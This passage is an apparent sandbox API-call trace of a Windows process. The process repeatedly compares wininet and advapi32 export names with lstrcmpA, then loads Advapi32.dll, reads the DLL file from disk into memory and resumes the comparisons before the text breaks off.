[0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0167.761] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0167.761] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0167.762] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0167.763] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0167.763] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0167.764] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0167.765] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.765] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0167.765] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0167.765] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0167.765] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0167.765] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0167.765] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0167.766] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0167.767] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0167.767] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0167.768] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0167.783] GetProcessHeap () returned 0x580000 [0167.783] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x40ba040 | out: hHeap=0x580000) returned 1 [0167.880] GetProcessHeap () returned 0x580000 [0167.880] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x599060 [0167.881] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0167.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0167.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0167.882] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0167.882] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0167.882] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0167.882] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0167.882] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0167.882] GetProcessHeap () returned 0x580000 [0167.882] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3ef0) returned 0x2cf2010 [0167.884] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0167.884] ReadFile (in: hFile=0x140, lpBuffer=0x2cf2010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf2010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0167.958] CloseHandle (hObject=0x140) returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0167.958] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0167.958] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0167.959] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0167.960] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", 